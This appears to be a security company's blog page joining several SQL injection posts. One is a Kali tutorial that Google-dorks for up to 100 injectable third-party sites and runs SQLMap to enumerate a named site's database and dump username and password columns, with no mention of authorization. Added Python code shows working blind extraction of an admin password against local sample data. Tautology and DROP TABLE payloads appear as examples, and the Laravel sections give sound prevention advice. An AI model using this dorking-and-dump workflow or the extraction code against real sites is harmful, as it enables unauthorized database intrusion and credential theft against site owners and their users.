Airzero Sec

We Do Not Give Up ! Trust US !


More and more web applications rely on a database to store and manage their data. The database sits between the users and the server-side code: it accepts and stores input, retrieves large volumes of records quickly, and makes it easy to group and query information.

That is both convenient and worrying, because a database usually holds the most sensitive details of an application: account credentials, financial records and so on. Carrying out a SQL injection attack does not always require expert skill, because tools such as SQLMap automate most of the work. SQLMap is a penetration-testing tool that detects and exploits SQL injection flaws automatically. In this post we show how to run a SQL injection with SQLMap. No special prerequisites are needed, although knowing a scripting language helps. The post is aimed at readers who are new to SQL injection, or who want to see how it works in practice.

What Is SQL Injection?

SQL injection, usually abbreviated SQLi, is one of the most common web attack techniques. The attacker supplies input that the back-end database interprets as SQL, which lets them read or modify data that was never meant to be exposed, including data that should be strictly confidential.

How does SQL injection work?

To run a SQL injection, an attacker must first locate a vulnerable input in a web application or page. An input is vulnerable when the application builds an SQL query by pasting the user-supplied value directly into the query text. The attacker can then submit a specially crafted value that changes the meaning of the query. The database's response (data, error messages, or a change in the page's behaviour) tells the attacker about the structure of the database, and from there they can work their way to all of the information it holds.

How do we do SQL injection using SQLmap in Kali Linux?

  • The first step is to install SQLiv on Kali Linux
  • The next step is to find SQL injection vulnerabilities with SQLiv
  • The last step is to exploit them with SQLMap

How to install SQLiv on Kali Linux?

Type following command into your terminal to install SQLiv:

~# git clone https://github.com/Hadesy2k/sqliv.git
~# cd sqliv && sudo python2 setup.py -i

After installation, SQLiv is placed at /usr/bin/sqliv, so you can call it from the terminal simply by typing 'sqliv'.

How do we find SQL injection vulnerabilities?

We use Google dorking to find candidate targets and let SQLiv test each result for an injectable parameter. Take a simple dork that matches e-commerce pages with the URL pattern 'item.php?id='. To find other patterns, search for "google dork list".

~# sqliv -d inurl:item.php?id= -e google -p 100

By default, SQLiv only crawls the first page of search results, which on Google means ten sites. The argument -p 100 makes it go through 100 sites instead.

How do we do SQL injection using SQLmap?

Once SQLiv has reported at least one injectable URL, we exploit it with SQLMap. The goal is to work down the hierarchy: first the database names, then the tables in a database, then the columns of a table, and finally the data those columns hold. The steps are:

  • The first step is to enumerate the database names
  • The next step is to enumerate the table names
  • The third step is to enumerate the column names
  • The last step is to dump the data

How to enumerate the database names:

Command pattern:

~# sqlmap -u "TARGET URL" --dbs
-u / --url : target URL
--dbs : enumerate the database names

So, for example, the command would look like this:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" --dbs

How to enumerate tables name:

Command pattern:

~# sqlmap -u "TARGET URL" -D database-name --tables

So, for example, the command would look like this:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture --tables

How to enumerate column names:

Command pattern:

~# sqlmap -u "TARGET URL" -D database-name -T table-name --columns

So, for example, the command would look like this:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings --columns

How do we dump data?

Command pattern:

~# sqlmap -u "TARGET URL" -D database-name -T table-name -C columns --dump

So, for example, the command would look like this:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings -C username,password --dump

If you omit -C, SQLMap dumps every column of the table. Note that --dump only reads data; it does not delete anything. As before, substitute the URL you are testing for the example URL:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings --dump

If you have any queries about the above topic or have to get services and consultations against this serious cyber threat. Feel free to contact us. AIRZERO SEC will be your strong cyber partner.

E-mail id: [email protected]


Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/


What Is SQL Injection?

SQL injection is a type of attack that lets an attacker execute SQL statements of their choosing against the database server behind a web application. Attackers use SQL injection vulnerabilities to get around an application's security controls: they can bypass the login page, read the contents of the whole database, and add, change or delete records. A good security provider will help you protect your database from this class of attack.

Any website that uses an SQL database such as MySQL, Oracle or others may have an SQL injection vulnerability. Criminals can use one to gain unauthorized access to sensitive data such as:

  • Customer information
  • Personal data
  • Trade secrets
  • Intellectual property and more

SQL injection is one of the oldest and most dangerous web application vulnerabilities. Security service providers can help you deal with it.

Why Laravel Framework?

Laravel is a web application framework with an expressive, elegant syntax that makes development faster, simpler and more pleasant by taking away much of the pain of writing complex PHP by hand.

It simplifies common tasks such as routing, authentication, sessions and caching so that developers can focus on the business features of the application. Laravel protects web apps from SQL injection as long as you use the fluent query builder or Eloquent with bound parameters.

It does this with prepared statements: the query text and the user-supplied values travel to the database separately, so the values are never parsed as SQL. If an attacker types a query into a form field hoping it will run, it reaches the database as an ordinary string value, and if the application saves it, it is simply stored as text.

What Are The Types Of SQL Injection Attack Vectors That Laravel Can’t Protect?

Developers often assume that Laravel protects against every SQL injection, but there are places where it cannot. Here are the most common causes of SQL injection we found in recent Laravel applications during our security reviews.

SQL Injection via column name

The first common mistake is to assume that Laravel escapes everything passed to the query builder or Eloquent. It does not: PDO cannot bind column names, so a user-controlled column name (for example in orderBy()) goes into the SQL text as-is, and passing one to the query builder is not safe.

That particular attack has been fixed in newer Laravel versions, but the current documentation still warns developers never to pass user-controlled column names to the query builder without whitelisting them first.

Even when a custom column name cannot be turned into injected SQL, we still recommend not letting users sort the data by an arbitrary column name they provide, since it can leak data and create a serious security issue.

SQL Injection via validation rules

Let’s take a look at the following simplified validation code:

$id = $request->route('id');
$rules = ['username' => 'required|unique:users,name,' . $id];

$validator = Validator::make($request->post(), $rules);

Laravel uses $id here to build the query behind the unique rule, and $id is not escaped. If it comes straight from the route without validation, an attacker can inject SQL through it. Laravel's documentation says the same: only pass a system-generated id (such as an auto-incrementing key or a UUID from a model instance) in that position, never raw request input.
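To make the two mistakes above (a user-controlled column name in ORDER BY, and a raw route value spliced into a unique:users,name,$id rule) concrete, here is an added example that is not from the original post or from Laravel. It is written in Python over an in-memory SQLite database because the mechanics do not depend on the framework: identifiers cannot be bound as parameters anywhere, so the fix is an allowlist, and a value that must be an id is reduced to an integer before use. The users table, its rows, the passwords and the ?sort= parameter are all constructed for the example.

```python
import sqlite3

# Constructed sample data for the example: a users table with a column the attacker wants.
SAMPLE_USERS = [(1, "alice", "s3cret"), (2, "bob", "hunter2"), (3, "carol", "abc123")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def list_users_unsafe(conn, sort_column):
    """VULNERABLE: identifiers cannot be bound as parameters, so whatever arrives in
    ?sort= is pasted into the SQL text (the orderBy($request->input('sort')) mistake)."""
    rows = conn.execute(f"SELECT name FROM users ORDER BY {sort_column}").fetchall()
    return [r[0] for r in rows]


ALLOWED_SORT_COLUMNS = ("id", "name")


def list_users_safe(conn, sort_column):
    """SAFE: the column name is checked against a fixed allowlist before it touches the query."""
    if sort_column not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_column!r}")
    rows = conn.execute(f"SELECT name FROM users ORDER BY {sort_column}").fetchall()
    return [r[0] for r in rows]


def order_by_oracle(conn, guess):
    """Attacker side: a 'column' that is really a CASE expression. If alice's password
    starts with `guess`, rows come back in id order (alice first); otherwise in reverse.
    Row order alone therefore answers a yes/no question about another row's secret."""
    payload = ("(CASE WHEN (SELECT password FROM users WHERE name = 'alice') LIKE "
               f"'{guess}%' THEN id ELSE -id END)")
    return list_users_unsafe(conn, payload)[0] == "alice"


def route_id_from_request(raw):
    """The same rule for values spliced into rule strings such as unique:users,name,$id:
    accept only what a system-generated id can look like, here a decimal integer."""
    if not raw.isdigit():
        raise ValueError(f"route id must be an integer, got {raw!r}")
    return int(raw)


if __name__ == "__main__":
    db = make_db()
    print("safe sort by name:", list_users_safe(db, "name"))
    print("does alice's password start with 's3'?", order_by_oracle(db, "s3"))
    print("does alice's password start with 'x'?", order_by_oracle(db, "x"))
    print("route id:", route_id_from_request("25"))
```

Repeating order_by_oracle() once per candidate character is all it takes to read the whole password out through a sort parameter, which is why the documentation's advice to whitelist sort columns is not optional. list_users_safe() refuses the CASE payload outright because it is not one of the two allowed names.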

How to prevent SQL injection in Laravel?

Laravel's Eloquent ORM uses PDO parameter binding, which protects web apps from SQL injection. This feature ensures that no client can change the intent of an SQL query through what they type into it.

Consider a form used to look up a user's record by email address, for instance "[email protected]". Now imagine that an attacker appends SQL to the email so that the query becomes:

SELECT * FROM users WHERE email = '[email protected]' or 1=1

Here 1=1 is a simple expression that always evaluates to true. Attached to the query with OR, it makes the WHERE condition true for every row, so the query returns every record in the table.

Now consider another form of the attack, in which the attacker terminates the statement after the email address and appends the command "drop table users". The query becomes:

SELECT * FROM users WHERE email = '[email protected]'; drop table users;

If the database executes both statements, the table "users" is deleted.

With PDO parameter binding in place, the whole input is treated as a single string value, which is equivalent to the query having been written as:

SELECT * FROM users WHERE email = '[email protected] or 1=1'

Since no record has that exact string as its email address, and the "1=1" is just part of the string, the query returns nothing.

The framework offers other ways to talk to the database, such as raw SQL queries, but Eloquent remains one of the most popular options.

Laravel uses PDO binding to prevent SQL injection because variables are sent to the database as bound parameters, never as part of the query text.

When you do write raw SQL, always use prepared statements with placeholders. Consider the following statement, which is ripe for SQL injection:

Route::get('this-is-prone-to-sql-injection', function () {
    $name = "'ancy' OR 1=1";
    // $name is interpolated into the SQL text, so its quotes and OR become part of the query
    return DB::select(DB::raw("SELECT * FROM users WHERE name = $name"));
});

Here the OR 1=1 in the injected value makes the condition true for every row, so the route returns the whole users table. It can be prevented by binding the value instead:

Route::get('safe-from-sql-injection', function () {
    $name = "'ancy' OR 1=1";
    // the ? placeholder is bound to $name as a value, so the quotes and OR never reach the SQL parser
    return DB::select("SELECT * FROM users WHERE name = ?", [$name]);
});

Laravel sends the query with the placeholder and the value separately; the database substitutes the value as data, so it cannot change the shape of the query. This protects the query from SQL injection.
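The concatenation-versus-binding contrast above, as an added example that is not from the original post or from Laravel: the same two queries, this time in Python against an in-memory SQLite database so they can be run end to end. The users table and its rows are constructed for the example. sqlite3's executescript() stands in for database APIs that accept several statements in one call (PHP's mysqli::multi_query(), for instance), because plain execute() in Python's sqlite3 refuses stacked statements, and that refusal is a property of one driver rather than a defence you can rely on.

```python
import sqlite3

# Constructed sample rows for the example.
SAMPLE_USERS = [(1, "alice", "alice@example.com"), (2, "bob", "bob@example.com")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def find_user_unsafe(conn, email):
    """VULNERABLE: the email is pasted into the SQL text, so quotes in it reshape the query."""
    sql = f"SELECT name FROM users WHERE email = '{email}'"
    return [r[0] for r in conn.execute(sql).fetchall()]


def find_user_safe(conn, email):
    """SAFE: the driver sends the SQL and the value separately (PDO-style parameter binding)."""
    sql = "SELECT name FROM users WHERE email = ?"
    return [r[0] for r in conn.execute(sql, (email,)).fetchall()]


def find_user_unsafe_stacked(conn, email):
    """VULNERABLE, on a connection that runs several statements per call.
    executescript() plays the role of such an API; the SELECT result is discarded."""
    conn.executescript(f"SELECT name FROM users WHERE email = '{email}';")


def table_exists(conn, name):
    row = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row[0] == 1


def demo():
    """Run both variants against the same payloads and collect what each one did."""
    conn = make_db()
    results = {}
    # an honest lookup behaves the same either way
    results["normal"] = find_user_unsafe(conn, "alice@example.com")
    # tautology: WHERE email = 'x' OR '1'='1' is true for every row
    results["tautology_unsafe"] = find_user_unsafe(conn, "x' OR '1'='1")
    # the bound version compares the literal string "x' OR '1'='1" and matches nothing
    results["tautology_safe"] = find_user_safe(conn, "x' OR '1'='1")
    # stacked query: harmless when bound ...
    results["stacked_safe"] = find_user_safe(conn, "x'; DROP TABLE users; --")
    results["table_before_stacked"] = table_exists(conn, "users")
    # ... fatal when concatenated on a multi-statement connection
    find_user_unsafe_stacked(conn, "x'; DROP TABLE users; --")
    results["table_after_stacked"] = table_exists(conn, "users")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:22s} {value}")
```

The tautology payload used here, x' OR '1'='1, closes the attacker's own quote and leaves the query syntactically valid, which is the form that works in practice; the page's `or 1=1` sketch leaves a dangling quote and is meant as an illustration of the idea rather than a literal payload.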



What is SQL Injection (SQLi)?

SQL injection, usually abbreviated SQLi, is a common attack technique that uses crafted SQL to manipulate the back-end database and reach information that was never meant to be displayed, much of it private and sensitive. This kind of attack targets the confidential databases behind an application and tricks them into doing things they were never meant to do. A security services company can help protect that data from attackers, and it is worth consulting one.

Actions a successful attack may take include:

  • Bypass authentication
  • Stealing data
  • Modifying or corrupting data
  • Deleting data
  • Running arbitrary code
  • Gaining root access to the system itself

What is SQL injection vulnerability?

SQL injection is one of the most serious threats to the confidentiality and integrity of data in web applications, and it has been one of the most common and most widely documented vulnerabilities since it was first described.

Non-Technical Explanation Of SQL Injection Vulnerability For Understanding:

Imagine a fully automated bus that follows an instruction the owner writes on a standard form. The instruction looks like this: "Drive along route 66 and stop at the bus stops if there are people at them." The owner fills in the route and the stopping rule; the bus does the rest. Now imagine someone manages to submit this instead: "Drive along route 66 and don't stop at bus stops, and ignore the rest of this form, if there are people at the bus stops."

The bus is fully automated and does exactly what it is told: it drives along route 66 and does not stop at any stop, even when people are waiting. The injection works because the structure of the instruction and the data supplied for it are not kept separate. The bus does not distinguish instructions from data; it simply parses whatever it is fed.

SQL injection vulnerabilities rest on the same idea. Attackers inject their own instructions into the data an application collects, and the application passes the result on to the database server, which executes it.

Types of SQL injection vulnerabilities

Attackers can exfiltrate data from a server by exploiting SQL injection vulnerabilities in several ways:

  • Error-Based SQL Injection
    When exploiting an error-based SQL injection, attackers read information such as table names and contents out of the database error messages shown on the page.
  • Boolean-Based SQL Injection
    Sometimes there is no visible error message when an SQL query fails, which makes it harder for an attacker to get information out of the vulnerable application. There is still a way to extract it.
    When an SQL query fails, or its condition flips from true to false, parts of the page disappear or change, or the whole page fails to load. These differences let attackers work out whether an input parameter is vulnerable and, by asking one true/false question at a time, extract data through it.
  • Time-Based SQL Injection
    In some cases the vulnerable query has no visible effect on the page at all, yet it is still possible to extract information from the database.
    Attackers do this by instructing the database to wait a chosen amount of time before responding, on condition that some statement is true. If the page is not vulnerable it loads quickly; if it is, it takes noticeably longer. That delay is enough to extract data even though nothing on the page changes. The SQL syntax is much the same as for boolean-based injection, with a delay function in place of the visible change.
  • Out-of-Band SQL Injection
    Sometimes the only way for an attacker to retrieve information is through an out-of-band channel. These attacks usually make the database server itself send the data, for example over DNS or HTTP, to a machine the attacker controls. Attackers also use this method when the injection does not take effect at the moment the data is supplied but at a later point in time.
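The boolean-based and time-based techniques above, as an added example that is not part of the original post. It is Python over an in-memory SQLite database: item_page() plays the vulnerable item.php?id= endpoint and returns only whether the product panel was rendered, and the attacker functions recover a password from an unrelated users table one character at a time through that single bit of information. The items and users tables, the admin password and the sleep() function (registered into SQLite to stand in for MySQL's SLEEP() or PostgreSQL's pg_sleep(), which SQLite lacks) are all constructed for the example.

```python
import sqlite3
import time


def make_db():
    conn = sqlite3.connect(":memory:")
    # the table the vulnerable page reads ...
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(25, "oak table"), (26, "pine chair")])
    # ... and the one the attacker is after
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'Pa55w0rd')")
    # SQLite has no SLEEP(); a registered Python function stands in for it
    conn.create_function("sleep", 1, lambda seconds: time.sleep(seconds) or 1)
    return conn


def item_page(conn, item_id):
    """VULNERABLE endpoint: the id parameter is pasted into the query. Returns True when
    the item panel is rendered (a row came back) and False when the page is blank."""
    sql = f"SELECT name FROM items WHERE id = {item_id}"
    return conn.execute(sql).fetchone() is not None


def boolean_oracle(conn, condition):
    """Boolean-based: the page content differs depending on the injected condition."""
    return item_page(conn, f"25 AND ({condition})")


def time_oracle(conn, condition, delay=0.05):
    """Time-based: same idea, but the only signal is how long the response takes."""
    start = time.perf_counter()
    item_page(conn, f"25 AND (CASE WHEN ({condition}) THEN sleep({delay}) ELSE 0 END)")
    return time.perf_counter() - start >= delay / 2


ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"


def extract_string(conn, oracle, subquery, alphabet=ALPHABET, max_len=32):
    """Recover the result of `subquery` one character at a time through a true/false oracle.
    unicode() turns the comparison numeric, so it is case-sensitive and needs no quotes."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = f"unicode(substr(({subquery}), {pos}, 1)) = {ord(ch)}"
            if oracle(conn, cond):
                found += ch
                break
        else:
            break  # no candidate matched: past the end of the string
    return found


def steal_admin_password(conn, oracle=boolean_oracle):
    return extract_string(conn, oracle, "SELECT password FROM users WHERE name = 'admin'")


if __name__ == "__main__":
    db = make_db()
    print("boolean oracle says 1=1 is", boolean_oracle(db, "1=1"))
    print("time oracle says 1=2 is", time_oracle(db, "1=2"))
    print("admin password via boolean inference:", steal_admin_password(db))
```

Passing time_oracle to steal_admin_password() recovers the same string with no visible change to the page at all, only more slowly: each query that hits a correct character costs one delay, which is the trade-off tools such as SQLMap manage for you when they fall back to time-based techniques.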

What Can Attackers do after SQL Injection Attack?

To perform an SQL injection attack, an attacker must locate a vulnerable input in a web application or page. An input is vulnerable when the application inserts it directly into an SQL query. The attacker can then submit a specially crafted SQL fragment as the input. The response it produces gives the attacker a clear picture of the database structure and, from there, access to any or all of the information in it.

SQL is the language used to talk to the database; SQL statements retrieve and update the data it holds. Attackers type malicious SQL into an input field and, in response, the database hands over sensitive information. The aim of the exploit is to reach data of a website or application that the attacker is not authorized to see. Most websites and web applications store data in SQL databases, so for any of them it is essential to test for vulnerabilities and make sure there is no opening for SQL injection.

What is the impact of a successful SQL injection attack?

Without mitigating controls, SQL injection leaves an application at high risk of compromise, with impact on the confidentiality and integrity of its data as well as on its authentication and authorization. An adversary can steal sensitive information stored in the databases used by vulnerable programs, such as user credentials, trade secrets or transaction records. SQL injection vulnerabilities should never be left open; they must be fixed in all circumstances. If the authentication or authorization logic is affected, an attacker may be able to log in as another user, for example an administrator, and so elevate their privileges.

How to prevent SQL Injection Attacks?

Preventing SQL injection is largely a matter of making sure that no input field lets untrusted data reach the database as code. Checking every page and every application by hand is impractical, especially when updates are frequent and user-friendliness is the top priority.

Nonetheless, security analysts and experienced developers recommend the following measures to make sure your database is well protected within the confines of the server.

  1. Continuous Scanning and Penetration Testing
    Automated web application scanners have long been the easiest way to spot vulnerabilities in online applications. Now that injection attacks increasingly exploit logical flaws, website security teams should add manual testing with the help of a security vendor.
    Testers check user inputs against rules for syntax, type and length, and audit the application for vulnerabilities quietly so that you can patch the code before attackers exploit it.
  2. Restrict Privileges
    This is more of a database administration task, but giving each account only the privileges it needs limits what any SQL injection, blind or otherwise, can do. Start with an account that has no privileges and grant 'read-only', 'edit', 'delete' and similar levels only as required.
    Minimizing the privileges of the application's database account ensures that an attacker who gets into the database through the application cannot reach data the application itself never needed.
  3. Use Query Parameters
    Dynamic queries built from strings are a constant source of trouble: each one is a separate vulnerability to track, and the problem only grows with updates and changes. Use parameterized (prepared) queries instead.
    They are simple to write, and each parameter in the SQL is declared explicitly, so the database can tell code from data input.
  4. Instant Protection
    Many organizations struggle with outdated code, too few resources to test and change it, little application security knowledge, and frequent updates. For them, web application protection is the best stopgap.
    A managed web application firewall can be deployed for immediate mitigation: it applies custom policies to block suspicious input and stop a data breach as it happens, so you do not have to hunt for every loophole by hand before fixing the underlying problems.
